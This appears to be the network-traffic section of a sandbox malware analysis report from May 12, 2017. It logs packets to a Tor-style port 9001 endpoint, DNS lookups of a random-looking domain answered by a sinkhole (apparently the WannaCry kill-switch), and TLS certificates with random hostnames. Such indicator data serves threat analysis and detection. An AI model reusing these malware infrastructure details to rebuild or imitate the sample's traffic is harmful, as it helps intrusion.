May 12, 2017 18:55:31.948945999 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.953252077 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.953274965 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.953346968 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.953361988 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.962601900 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.962614059 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.962734938 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.962752104 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.964968920 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.964987993 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.965065002 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.965080023 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.971843004 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.971863031 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.971961021 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.971976042 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.034569979 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.034673929 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.034694910 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.072571039 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.072593927 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.072678089 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.072698116 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.074438095 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.074465036 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.074564934 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.074579954 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.074635983 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.074654102 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.074702978 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.074717045 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.074791908 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.074803114 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.074856043 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.074870110 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.075110912 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.075130939 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.075180054 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.075192928 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.075301886 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.075320959 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.075371981 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.075383902 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.075423002 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.075438976 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.075544119 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.075558901 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.077176094 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.077208996 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.077280998 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.077295065 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.078892946 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.078910112 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.078953981 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.078983068 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.078995943 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079015017 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079070091 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.079086065 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079416037 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079427004 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079479933 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079480886 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.079489946 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079497099 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079507113 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079562902 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.079777002 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079889059 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079896927 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079943895 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.080075979 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.080084085 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.080089092 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.080137014 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.082320929 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.082331896 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.082339048 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.082392931 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.082431078 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.082458973 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.082531929 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.082541943 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.082549095 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.082591057 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.082611084 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.082690954 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.082742929 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.082771063 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.083931923 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.083950996 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.083998919 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.084001064 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.084008932 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.084019899 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.084028959 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.084080935 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.084214926 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.084225893 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.084244967 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.084275007 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.084336042 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.084352016 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.084491014 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.084532976 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.084547997 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086240053 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086251974 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086303949 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086313009 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.086313963 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086323023 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086334944 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086383104 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086389065 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.086390972 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086405039 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086436033 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086489916 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.086504936 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.087899923 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.087986946 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.088001966 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.088129044 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.088140011 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.088207960 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.088221073 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.092992067 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.093019009 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.093081951 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.093096972 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.103948116 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.104024887 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.104039907 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.104626894 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.104655027 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.104737043 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.104753971 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.104810953 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.104837894 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.104890108 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.104906082 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.104979992 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105003119 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105055094 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.105070114 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105171919 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105189085 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105243921 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.105259895 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105540037 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105551958 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105557919 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105607033 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.105633974 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105676889 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105690002 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105762005 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.105777979 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105823040 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105834961 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105895996 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.105911016 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.106281042 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.106292963 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.106360912 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.106388092 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.106499910 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.106513023 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.106571913 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.106587887 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.108685970 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.108700037 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.108752966 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.108764887 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.108783007 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.108793020 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.108807087 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.108836889 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.113401890 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.113415003 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.113485098 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.113500118 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.115741014 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.115772963 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.115797043 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.115808010 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.115910053 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.115921974 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.115931034 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.116017103 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.116384029 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.116415024 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.116422892 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.116450071 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.116460085 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.116471052 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.116549015 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.116569996 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.116635084 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.116653919 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.117902994 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.117952108 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.118012905 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.118029118 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.118170977 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.118199110 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.118257046 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.118273020 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.148878098 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.148916006 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.149029970 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.149069071 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.181623936 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.181660891 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.182742119 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.182760000 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.183706045 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.183732986 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.191498041 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.229846954 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.230012894 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.230030060 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.232661963 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.232690096 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.232702017 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.232858896 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.232877016 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.236982107 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.237001896 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.237010956 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.237093925 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.237113953 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.238353014 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.238369942 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.238379955 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.238392115 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.238476992 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.238492012 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.239670038 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.239695072 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.239703894 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.239801884 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.239821911 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.242374897 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.242389917 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.242480993 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.242494106 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.242506027 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.242516041 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.242543936 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.243746042 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.243763924 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.243822098 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.243841887 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.244927883 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.244942904 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.245044947 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.245064020 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.253758907 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.253791094 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.253808975 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.253983021 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.254005909 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.254607916 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.254635096 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.254642010 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.254647017 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.255037069 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.255059004 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.255076885 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.255090952 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.255256891 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.255278111 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.256661892 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.256675005 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.256772995 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.256797075 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.260359049 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.260373116 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.260385990 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.260529995 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.260550022 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.267451048 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.267467976 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.267579079 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.267602921 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.272125959 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.272248983 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.272269964 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.272938013 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.272964954 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.273016930 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.273040056 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.273081064 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.273092985 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.273129940 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.273139000 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.273149014 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.273154974 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.273164988 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.273190975 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.273389101 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.274168968 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.274180889 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.274188042 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.274322033 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.274780989 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.275248051 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.275258064 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.275366068 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.275381088 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.276026011 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.276036024 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.276082039 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.276098967 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.281147957 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.281160116 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.281232119 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.281249046 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.360289097 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.360315084 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.360356092 CEST491989001192.168.1.1679.137.85.71

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 12, 2017 18:53:26.864295959 CEST | 53278 | 53 | 192.168.1.16 | 8.8.8.8
May 12, 2017 18:53:27.081289053 CEST | 53 | 53278 | 8.8.8.8 | 192.168.1.16
May 12, 2017 18:53:48.703721046 CEST | 64052 | 53 | 192.168.1.16 | 8.8.8.8
May 12, 2017 18:53:48.863464117 CEST | 53 | 64052 | 8.8.8.8 | 192.168.1.16

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 12, 2017 18:53:26.864295959 CEST | 192.168.1.16 | 8.8.8.8 | 0x288d | Standard query (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | A (IP address) | IN (0x0001)
May 12, 2017 18:53:48.703721046 CEST | 192.168.1.16 | 8.8.8.8 | 0xaf4a | Standard query (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 12, 2017 18:53:27.081289053 CEST | 8.8.8.8 | 192.168.1.16 | 0x288d | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | | 144.217.74.156 | A (IP address) | IN (0x0001)
May 12, 2017 18:53:48.863464117 CEST | 8.8.8.8 | 192.168.1.16 | 0xaf4a | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | | 144.217.74.156 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

HTTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Total Bytes Transferred (KB)
May 12, 2017 18:53:48.880690098 CEST | 49191 | 80 | 192.168.1.16 | 144.217.74.156 | 0
Header:
GET / HTTP/1.1
Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Cache-Control: no-cache

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Total Bytes Transferred (KB)
May 12, 2017 18:53:49.145505905 CEST | 80 | 49191 | 144.217.74.156 | 192.168.1.16 | 1
Header:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 12 May 2017 16:53:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: sinkhole
Data Raw: 35 31 0d 0a 73 69 6e 6b 68 6f 6c 65 2e 74 65 63 68 20 2d 20 77 68 65 72 65 20 74 68 65 20 62 6f 74 73 20 70 61 72 74 79 20 68 61 72 64 20 61 6e 64 20 74 68 65 20 72 65 73 65 61 72 63 68 65 72 73 20 68 61 72 64 65 72 2e 0a 3c 21 2d 2d 20 68 32 20 2d 2d 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 51sinkhole.tech - where the bots party hard and the researchers harder.... h2 -->0

HTTPS Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Subject | Issuer | Not Before | Not After | Certificate Details
May 12, 2017 18:54:27.140882969 CEST | 443 | 49196 | 131.188.40.189 | 192.168.1.16 | CN=www.wo5k4yq6pd.net | CN=www.esxd5zx3.com | Sat May 13 02:00:00 CEST 2017 | Tue Feb 27 00:59:59 CET 2018 | Version: V3; Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5; Key: Sun RSA public key, 1024 bits; public exponent: 65537; SerialNumber: [ 1d4880aa 8ebd1a97]
May 12, 2017 18:54:27.180291891 CEST | 443 | 49195 | 95.130.12.119 | 192.168.1.16 | CN=www.nx6fem63plxi6et.net | CN=www.ahmoeakkg6wqpgzpaim.com | Sun Mar 19 01:00:00 CET 2017 | Mon Oct 16 01:59:59 CEST 2017 | Version: V3; Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5; Key: Sun RSA public key, 1024 bits; public exponent: 65537; SerialNumber: [ aaeaa4c4 4b26599b]
May 12, 2017 18:54:37.003830910 CEST | 443 | 49197 | 85.235.250.88 | 192.168.1.16 | CN=www.quob4edbiuwyav4.net | CN=www.377yrgafvm3.com | Sun Mar 19 01:00:00 CET 2017 | Sat Jan 27 01:00:00 CET 2018 | Version: V3; Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5; Key: Sun RSA public key, 1024 bits; public exponent: 65537; SerialNumber: [ efa7449e cb5827a5]
